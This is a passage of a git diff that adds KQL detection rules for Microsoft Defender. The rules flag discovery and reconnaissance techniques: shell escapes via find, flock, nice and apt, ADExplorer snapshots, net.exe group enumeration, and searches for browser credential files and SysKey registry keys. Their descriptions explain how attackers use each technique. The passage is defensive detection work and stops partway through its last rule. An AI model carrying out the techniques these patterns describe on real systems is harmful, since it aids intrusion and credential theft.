attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " . " and ProcessCommandLine contains "-exec") and FolderPath endswith "/find") \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql new file mode 100644 index 00000000..6c2feb35 --- /dev/null +++ b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql @@ -0,0 +1,11 @@ +// Title: Shell Execution via Flock - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -u " and FolderPath endswith "/flock") \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql new file mode 100644 index 00000000..7972f9a9 --- /dev/null +++ b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql @@ -0,0 +1,11 @@ +// Title: Shell Execution via Nice - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/nice" \ No newline at end of file diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql new file mode 100644 index 00000000..227da4e0 --- /dev/null +++ b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql @@ -0,0 +1,12 @@ +// Title: Shell Invocation via Apt - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: medium +// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. +Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where ProcessCommandLine contains "APT::Update::Pre-Invoke::=" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql new file mode 100644 index 00000000..9d0546ef --- /dev/null +++ b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Active Directory Database Snapshot Via ADExplorer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: high +// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 + +DeviceProcessEvents +| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql new file mode 100644 index 00000000..25af7557 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution of Hostname +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Use of hostname to get information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where FolderPath endswith "\\HOSTNAME.EXE" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql new file mode 100644 index 00000000..d7e57ab4 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution of Systeminfo +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Detects usage of the "systeminfo" command to retrieve information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql new file mode 100644 index 00000000..863b4d79 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql @@ -0,0 +1,15 @@ +// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE +// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE +Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002 +// False Positives: +// - Inventory tool runs +// - Administrative activity + +DeviceProcessEvents +| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts ")) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql new file mode 100644 index 00000000..023b2ff0 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Kernel Dump Using Dtrace +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-28 +// Level: high +// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_network_command.kql b/KQL/rules/Discovery/suspicious_network_command.kql new file mode 100644 index 00000000..53201dc7 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_network_command.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Network Command +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-12-07 +// Level: low +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Administrator, hotline ask to user + +DeviceProcessEvents +| where ProcessCommandLine matches regex "ipconfig\\s+/all" or ProcessCommandLine matches regex "netsh\\s+interface show interface" or ProcessCommandLine matches regex "arp\\s+-a" or ProcessCommandLine matches regex "nbtstat\\s+-n" or ProcessCommandLine matches regex "net\\s+config" or ProcessCommandLine matches regex "route\\s+print" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql new file mode 100644 index 00000000..3e583006 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Network Connection to IP Lookup Service APIs +// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-24 +// Level: medium +// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate use of the external websites for troubleshooting or network monitoring + +DeviceNetworkEvents +| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql new file mode 100644 index 00000000..34ef9ca1 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Query of MachineGUID +// Author: frack113 +// Date: 2022-01-01 +// Level: low +// Description: Use of reg to get MachineGuid information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql new file mode 100644 index 00000000..f6ee94f0 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-10 +// Level: medium +// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql new file mode 100644 index 00000000..80dedcc3 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql new file mode 100644 index 00000000..0a7c5893 --- /dev/null +++ b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Use of PsLogList +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: medium +// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002 +// False Positives: +// - Another tool that uses the command line switches of PsLogList +// - Legitimate use of PsLogList by an administrator + +DeviceProcessEvents +| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " –d" or ProcessCommandLine contains " —d" or ProcessCommandLine contains " ―d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " –x" or ProcessCommandLine contains " —x" or ProcessCommandLine contains " ―x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " –c" or ProcessCommandLine contains " —c" or ProcessCommandLine contains " ―c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/Discovery/suspicious_where_execution.kql new file mode 100644 index 00000000..53b1b25c --- /dev/null +++ b/KQL/rules/Discovery/suspicious_where_execution.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Where Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: low +// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. +Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about +internal network resources such as servers, tools/dashboards, or other related infrastructure. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1217 + +DeviceProcessEvents +| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data") \ No newline at end of file diff --git a/KQL/rules/Discovery/syskey_registry_keys_access.kql b/KQL/rules/Discovery/syskey_registry_keys_access.kql new file mode 100644 index 00000000..ddeba016 --- /dev/null +++ b/KQL/rules/Discovery/syskey_registry_keys_access.kql @@ -0,0 +1,10 @@ +// Title: SysKey Registry Keys Access +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-12 +// Level: high +// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012 + +DeviceRegistryEvents +| where RegistryKey endswith "lsa\\JD" or RegistryKey endswith "lsa\\GBG" or RegistryKey endswith "lsa\\Skew1" or RegistryKey endswith "lsa\\Data" \ No newline at end of file diff --git a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql new file mode 100644 index 00000000..b85dbb89 --- /dev/null +++ b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql @@ -0,0 +1,10 @@ +// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE +// Author: frack113 +// Date: 2021-12-16 +// Level: high +// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents +| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery.kql b/KQL/rules/Discovery/system_information_discovery.kql new file mode 100644 index 00000000..cc756587 --- /dev/null +++ b/KQL/rules/Discovery/system_information_discovery.kql @@ -0,0 +1,12 @@ +// Title: System Information Discovery +// Author: Ömer Günal, oscd.community +// Date: 2020-10-08 +// Level: informational +// Description: Detects system information discovery commands +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/uname" or FolderPath endswith "/hostname" or FolderPath endswith "/uptime" or FolderPath endswith "/lspci" or FolderPath endswith "/dmidecode" or FolderPath endswith "/lscpu" or FolderPath endswith "/lsmod" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql new file mode 100644 index 00000000..3e3bd8b8 --- /dev/null +++ b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql @@ -0,0 +1,15 @@ +// Title: System Information Discovery Using Ioreg +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: medium +// Description: Detects the use of "ioreg" which will show I/O Kit registry information. +This process is used for system information discovery. +It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-l" or ProcessCommandLine contains "-c") and (ProcessCommandLine contains "AppleAHCIDiskDriver" or ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "Oracle" or ProcessCommandLine contains "Parallels" or ProcessCommandLine contains "USB Vendor Name" or ProcessCommandLine contains "VirtualBox" or ProcessCommandLine contains "VMware") and (FolderPath endswith "/ioreg" or ProcessCommandLine contains "ioreg") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql new file mode 100644 index 00000000..15533619 --- /dev/null +++ b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql @@ -0,0 +1,12 @@ +// Title: System Information Discovery Using sw_vers +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: medium +// Description: Detects the use of "sw_vers" for system information discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents +| where FolderPath endswith "/sw_vers" and (ProcessCommandLine contains "-buildVersion" or ProcessCommandLine contains "-productName" or ProcessCommandLine contains "-productVersion") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql new file mode 100644 index 00000000..c317d814 --- /dev/null +++ b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql @@ -0,0 +1,14 @@ +// Title: System Information Discovery Using System_Profiler +// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ) +// Date: 2024-01-02 +// Level: medium +// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. +This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "SPApplicationsDataType" or ProcessCommandLine contains "SPHardwareDataType" or ProcessCommandLine contains "SPNetworkDataType" or ProcessCommandLine contains "SPUSBDataType") and (FolderPath endswith "/system_profiler" or ProcessCommandLine contains "system_profiler") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql new file mode 100644 index 00000000..70672c0e --- /dev/null +++ b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql @@ -0,0 +1,12 @@ +// Title: System Information Discovery via Registry Queries +// Author: lazarg +// Date: 2025-06-12 +// Level: low +// Description: Detects attempts to query system information directly from the Windows Registry. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql new file mode 100644 index 00000000..6c39bf7b --- /dev/null +++ b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql @@ -0,0 +1,11 @@ +// Title: System Integrity Protection (SIP) Disabled +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-02 +// Level: medium +// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "disable" and FolderPath endswith "/csrutil" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql new file mode 100644 index 00000000..d9be9e23 --- /dev/null +++ b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql @@ -0,0 +1,13 @@ +// Title: System Integrity Protection (SIP) Enumeration +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-02 +// Level: low +// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "status" and FolderPath endswith "/csrutil" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql new file mode 100644 index 00000000..1847f896 --- /dev/null +++ b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql @@ -0,0 +1,12 @@ +// Title: System Network Connections Discovery - Linux +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of system utilities to discover system network connections +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat") and (not((FolderPath endswith "/who" and InitiatingProcessCommandLine contains "/usr/bin/landscape-sysinfo"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql new file mode 100644 index 00000000..fbd98d19 --- /dev/null +++ b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: System Network Connections Discovery - MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities to discover system network connections +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat" \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql new file mode 100644 index 00000000..563ac286 --- /dev/null +++ b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql @@ -0,0 +1,10 @@ +// Title: System Network Connections Discovery Via Net.EXE +// Author: frack113 +// Date: 2021-12-10 +// Level: low +// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. +// MITRE Tactic: Discovery +// Tags: 